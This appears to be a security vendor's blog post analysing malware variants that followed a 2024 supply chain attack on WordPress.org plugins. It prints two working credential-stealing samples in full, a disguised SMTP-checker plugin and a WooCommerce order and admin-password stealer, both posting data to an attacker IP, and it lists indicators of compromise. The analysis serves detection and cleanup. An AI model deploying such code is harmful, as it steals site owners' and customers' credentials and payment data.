The Aftermath of the WordPress.org Supply Chain Attack: New Malware and Techniques Emerge
On Monday June 24th, 2024 the Wordfence Threat Intelligence team was made aware of the presence of malware in the Social Warfare repository plugin. After adding the malicious code to our Threat Intelligence Database and examining it, we discovered additional affected plugins and continued monitoring the situation throughout the week. More plugins were affected prior to WordPress.org forcing a password reset.
Malware signatures were written by our analysts the same day as the initial notification of compromise and were released for our Wordfence Premium, Wordfence Care, and Wordfence Response users on June 25, 2024. Free users received the same signatures with a 30 day delay on July 25, 2024. Additional malware signatures were released over the days and weeks that followed to address new malware variants.
In today’s blog post we will provide a closer look into how the malware has evolved and update you on what to look out for if you suspect your site might be affected.
A New Technique: Credential Exfiltration
On July 14, 2024, an affected WordPress agency with a significant number of sites reached out to us after suffering from a major infection as a result of the supply chain attack when their Blaze Widget and Social Warfare plugins were updated. Unaware of this compromise, they noticed several rogue Administrator user accounts on several of their websites days later.
Upon further investigation, they discovered the intrusion vector and shared a malware sample with us that was found in the plugins directory of one of their sites. It was configured to send data to the IP address 94.156.79.8, the same address that was at the heart of the supply chain attack and serves as a data gathering hub for the malicious actors, who also use it to host malicious scripts.
When we first encountered the IP address in conjunction with the supply chain attack, we marked it as malicious in our Threat Intelligence platform. The presence of the IP Address in a PHP file should result in a scan alert during properly configured Wordfence scans. This is true for all Wordfence users.
A Rogue Plugin: Custom Mail SMTP Checker
A rogue plugin named Custom Mail SMTP Checker was found on one of this agency’s websites. The plugin contained the following code:
<?php /* Plugin Name: Custom Mail SMTP Checker Description: Check and display the wp_mail_smtp option value. Version: 1.0 Author: Your Name */ // Hook into admin_init to ensure WordPress is fully loaded // Hook into admin_init to ensure WordPress is fully loaded add_action('admin_init', 'custom_mail_smtp_checker'); function custom_mail_smtp_checker() { // Check if wp_mail_smtp option exists and is not empty $smtp_options = get_option('wp_mail_smtp'); if ($smtp_options && is_array($smtp_options) && !empty($smtp_options)) { $flattened_array = flatten_array($smtp_options); // Prepare data to send to Node.js endpoint $data_to_send = array( 'host' => site_url(), // Get WordPress site URL 'smtp_credentials' => $flattened_array ); // Send data to Node.js endpoint $response = wp_remote_post('hxxps://94.156.79[.]8/receive-smtp-data', array( 'body' => json_encode($data_to_send), 'headers' => array( 'Content-Type' => 'application/json' ) )); // Check if response is successful (for logging or error handling) if (is_wp_error($response)) { $error_message = $response->get_error_message(); error_log("Failed to send data to Node.js endpoint: $error_message"); } else { // Log success message if needed error_log("Data sent to Node.js endpoint successfully."); } } } function flatten_array($array, $prefix = '') { $result = []; foreach ($array as $key => $value) { // Construct new key in the format parent_keyname > key $new_key = $prefix . '_' . $key; if (is_array($value) && !empty($value)) { // Recursively flatten nested arrays $result = array_merge($result, flatten_array($value, $new_key)); } elseif (!empty($value) || $value === '0') { // Add to result if value is not empty (including '0' as valid) $result[$new_key] = $value; } } return $result; }
When malware was originally added to several repository plugins last month, the primary purpose was to spread the infection to other sites, inject crypto malware and retain admin access to infected sites. Conversely, the purpose of the above script is to exfiltrate SMTP credentials used by WP Mail SMTP, a plugin with more than 3 million installs.
We want to stress that this does not imply that the WP Mail SMTP plugin is vulnerable – especially since the current version stores the SMTP password in encrypted form out of the box (as of version 2.5.0, released in October, 2020) – with a key that is stored in a different table entry. The code above only exfiltrates an encrypted password from the WP Mail SMTP plugin.
Although an encrypted password is of limited use, the malicious actors likely already have access to an admin account and would be able to retrieve the encryption key via alternate routes. Another possibility is that this script is still going through testing like we had observed in the original supply chain attack. In that case we should expect other variants of this piece of malware to surface that will take care of the decryption before sending the data back.
Considering the fact that the stored SMTP password should be encrypted on most – if not all – sites, the impact of this script sending data to the malicious actors’ server is likely to be minimal. However, if you find this malware on your site and use this plugin or have used it in the past, we strongly suggest that you change your email password immediately and perform a thorough site clean.
If an attacker manages to gain access to credentials of an active email account, they may use such an account to send spam, and may also be able to reset passwords of websites and services where the email is used. This serves as a good reminder to only use accounts that are created specifically for the purpose of sending emails from your website as opposed to general purpose email accounts that are also used for banking and other sites.
More Malware Variants: WooCommerce Order Info and Braintree API Info Stealer
While reviewing malware scan results and doing additional research, we discovered another new piece of malware reported by Terence Eden via social network Mastodon who also noticed the rogue Custom Mail SMTP Checker plugin on one of their sites.
The second exfiltration script is intended to steal WooCommerce order information with the relevant code shown below:
$order_summary = get_woocommerce_orders_summary($mysqli, $config); $url = 'hxxps://94.156.79[.]8/AddSites'; $aurl = get_admin_url(); $post_data = array( 'aurl' => $aurl, 'domain' => $domain, 'username' => $username, 'passwordz' => $password, 'wp_login_path' => $wp_login_path ); if ($order_summary !== false) { echo("found orders"); echo($order_summary); $post_data['order_summary'] = $order_summary; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', 'Content-Length: ' . strlen(json_encode($post_data)) )); $response = curl_exec($ch); $error = curl_error($ch); curl_close($ch);
In this sample, orders are collected via the get_woocommerce_orders_summary()
function. Next, some site information is collected, including domain, admin username and password as we have seen before. The order data, if any, is bundled with the admin credentials and sent off to the attacker-controlled IP address.
The Braintree information stealer we later discovered via one of our malware signatures works along similar lines, but of course gathers Braintree API information.
The potential impact of these two pieces of malware includes leaking sensitive information about customers as well as payment-related information for external services.
Indicators of Compromise
If you suspect that your site might be infected with remnants of the initial supply chain attack or newer strains of the malware, an obvious sign that something is amiss is the presence of the IP address 94.156.79.8. If you find this IP in one of your site’s PHP files, or if it is detected during a Wordfence scan, you can be fairly certain that some sensitive information is being exfiltrated from your site and sent to the attackers.
File names to look out for include:
- /wp-content/plugins/informative/testplugingodlike.php
- /wp-content/plugins/core_plug/godlikeplug8.php
- /wp-content/plugins/braintree-api-key-sender3/braintree-api-key-sender.php
- /wp-content/plugins/hello-world/`xg.php
- /wp-content/plugins/hello-world/hello-world.php
- /wp-content/plugins/custom-mail-smtp-checker/custom-mail-smtp-checker.php
These plugin names may vary and will likely change over time, but so far the IP is a good indicator that the code surrounding it is malicious.
Additionally, we have been seeing that include statements for malicious cryptomining JavaScript are injected directly into cached pages in some cases. If you are using a caching plugin and perform a properly configured Wordfence scan on those cached pages, you should receive an alert for the above IP address. We recommend clearing your cache once a full site clean has been completed.
Important IPs
94.156.79.8 – Malicious IP address controlled by the threat actor(s), which is used to host malicious JavaScript and as an information gathering server.
Suspicious Admin Usernames
The usernames PluginAUTH
, PluginGuest
, and Options
were used for administrative users created during the initial supply chain attack.
Additionally, Terence Eden reported usernames such as aaBGFtd
, aaCmiuz
and others that appear to be randomly generated. Some sites might see thousands of those user accounts.
We recommend checking for their presence and removing them if they are not legitimate.
Conclusion
In today’s post we discussed several new variants of malware that emerged from a recent supply chain attack on WordPress.org plugins. Newer strains of malware put an increased focus on credential exfiltration outside of WordPress itself and look for credentials related to email accounts and accounts related to payment processing.
New malware signatures have been released to our Wordfence Premium, Wordfence Care, and Wordfence Response users over the last month and continue to be developed as we see new variants emerge. Free users will receive the same signatures with a 30 day delay.
If your site has been compromised and infected by any of these pieces of malware, you must conduct a complete and thorough site clean. You can view our full guide to cleaning your WordPress site here, or you can sign up for Wordfence Care or Wordfence Response where we offer complete 24/7/365 incident response services for an entire year.
Comments